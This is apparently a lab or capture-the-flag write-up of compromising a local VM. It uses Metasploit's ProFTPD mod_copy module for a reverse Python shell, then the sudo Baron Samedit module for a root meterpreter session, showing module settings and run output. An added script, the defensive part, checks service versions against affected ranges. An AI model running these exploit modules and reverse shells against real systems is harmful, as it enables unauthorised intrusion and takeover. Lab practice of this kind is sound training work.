# Lab setup

Download the image, import it straight into the hypervisor, and use NAT mode for networking.

IP: 192.168.1.130

# Initial recon

```text
21/tcp open  ftp
80/tcp open  http
```

No FTP login with a blank password or anything of that sort, and sensitive-directory enumeration on port 80 turned up nothing.

Only two ports, so the next step is deeper service fingerprinting.

```text
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
```

Looking up the FTP version shows it is vulnerable, and msf already has an exploit module for it.

# Exploitation

# proftpd_modcopy_exec

Metasploit just ganks it outright.

```text
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.130    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www/html    yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5



View the full module info with the info, or info -d command.
```

`run` it and we get a shell.

# Privilege escalation

Search for a privesc module:

```text
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > search priv platform:linux ubuntu
```

Use number 62 from the results.

```text
msf6 exploit(linux/local/sudo_baron_samedit) > show options

Module options (exploit/linux/local/sudo_baron_samedit):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on
   WritableDir  /tmp             yes       A directory where you can write files.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  2255             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 192.168.1.129:2255
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: cmd
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.9.5 is a vulnerable build.
[*] Writing '/tmp/KZd7d.py' (2797 bytes) ...
[*] Writing '/tmp/libnss_tY8/0zE.so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 192.168.1.130
[+] Deleted /tmp/KZd7d.py
[+] Deleted /tmp/libnss_tY8/0zE.so.2
[+] Deleted /tmp/libnss_tY8
[*] Meterpreter session 2 opened (192.168.1.129:2255 -> 192.168.1.130:42417) at 2024-04-30 00:17:02 -0400

meterpreter > getuid
Server username: root
meterpreter >
```

That lands us root straight away.
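Both footholds in this box came down to a version string: the ProFTPD 1.3.5rc3 banner during fingerprinting, and the `sudo 1.8.9p5` build that the Baron Samedit module's check flagged. An inventory check that catches these before an attacker does has to order version suffixes correctly: `1.3.5rc3` is older than `1.3.5` (a release candidate), while `1.3.5a` and `1.8.9p5` are newer than their base version (patch builds). The script below is an added example, not code from the write-up or from Metasploit. It parses nmap-style service lines and `sudo --version` output and compares the versions against inclusive affected ranges. The sudo ranges are the Baron Samedit builds listed in the upstream sudo advisory; the ProFTPD upper bound of 1.3.5 is an assumption for the demo, taken from the msf target line "ProFTPD 1.3.5" above. The scan lines are the two from this lab and the sudo transcript is constructed.

```python
"""Added example (not part of the original write-up): version-aware checks
for the two findings in this lab.  Parses nmap-style service lines such as
"21/tcp open  ftp     ProFTPD 1.3.5rc3" and the first line of
`sudo --version`, then compares each version against an affected range.
The point is the suffix handling: "1.3.5rc3" must sort BEFORE "1.3.5"
(a release candidate is older than the release) while "1.3.5a" and
"1.8.9p5" sort AFTER their base version (patch builds); otherwise an
inventory check mis-classifies exactly the builds seen here."""
import re
from typing import List, Optional, Tuple

_PRE = {"alpha": -3, "beta": -2, "rc": -1}   # pre-release classes, ordered
_VERSION = re.compile(r"(\d+(?:\.\d+)*)(?:(alpha|beta|rc)(\d*)|p(\d+)|([a-z]))?")


def version_key(v: str) -> Tuple[Tuple[int, ...], int, int]:
    """Sortable key: (numeric parts padded to 4, suffix class, suffix number).
    Class -3..-1 = pre-release, 0 = plain release, 1 = patch build (pN / letter)."""
    m = _VERSION.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (4 - len(nums))
    if m.group(2):                       # e.g. 1.3.5rc3
        return (nums, _PRE[m.group(2)], int(m.group(3) or 0))
    if m.group(4):                       # e.g. 1.8.9p5
        return (nums, 1, int(m.group(4)))
    if m.group(5):                       # e.g. 1.3.5a
        return (nums, 1, ord(m.group(5)) - ord("a") + 1)
    return (nums, 0, 0)                  # e.g. 1.3.5


# Inclusive affected ranges.  The sudo ranges are the Baron Samedit builds
# listed in the upstream sudo advisory.  The ProFTPD upper bound is an
# ASSUMPTION for this demo, taken from the msf module target shown in the
# write-up ("ProFTPD 1.3.5"): 1.3.5 and everything before it is treated as affected.
AFFECTED = {
    "proftpd": [("0", "1.3.5")],
    "sudo": [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")],
}


def is_affected(product: str, version: str) -> Optional[bool]:
    """True/False for products in the table, None when we hold no data for them."""
    ranges = AFFECTED.get(product.lower().split()[0])
    if ranges is None:
        return None
    k = version_key(version)
    return any(version_key(lo) <= k <= version_key(hi) for lo, hi in ranges)


_NMAP = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
_BANNER = re.compile(r"^(.*?)\s+(\d+(?:\.\d+)+\S*)")


def check_scan(lines: List[str]) -> List[dict]:
    """Classify each 'port/proto open service product version' line."""
    out = []
    for line in lines:
        m = _NMAP.match(line.strip())
        if not m:
            continue                      # not a service line, skip it
        port, _proto, service, banner = m.groups()
        b = _BANNER.match(banner)
        if not b:                         # banner without a version number
            out.append({"port": int(port), "service": service, "product": banner,
                        "version": None, "affected": None})
            continue
        product, version = b.group(1), b.group(2)
        out.append({"port": int(port), "service": service, "product": product,
                    "version": version, "affected": is_affected(product, version)})
    return out


def sudo_version(output: str) -> Optional[str]:
    """Extract the version from `sudo --version` output ("Sudo version 1.8.9p5")."""
    m = re.search(r"^Sudo version (\S+)", output, re.MULTILINE)
    return m.group(1) if m else None


# Sample input: the two service lines from this lab's scan, plus a
# CONSTRUCTED `sudo --version` transcript for the same host.
SCAN_LINES = [
    "21/tcp open  ftp     ProFTPD 1.3.5rc3",
    "80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))",
]
SUDO_OUTPUT = "Sudo version 1.8.9p5\nSudoers policy plugin version 1.8.9p5\n"

if __name__ == "__main__":
    for r in check_scan(SCAN_LINES):
        print(r)
    v = sudo_version(SUDO_OUTPUT)
    print("sudo", v, "affected:", is_affected("sudo", v))
```

Apache is reported as `affected: None` rather than `False`, because the table holds no data for it; collapsing "unknown" into "safe" is how an inventory check silently misses the next box.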

# Wrap-up

Metasploit is the best!

I still need to write up a summary of privilege-escalation techniques on Linux.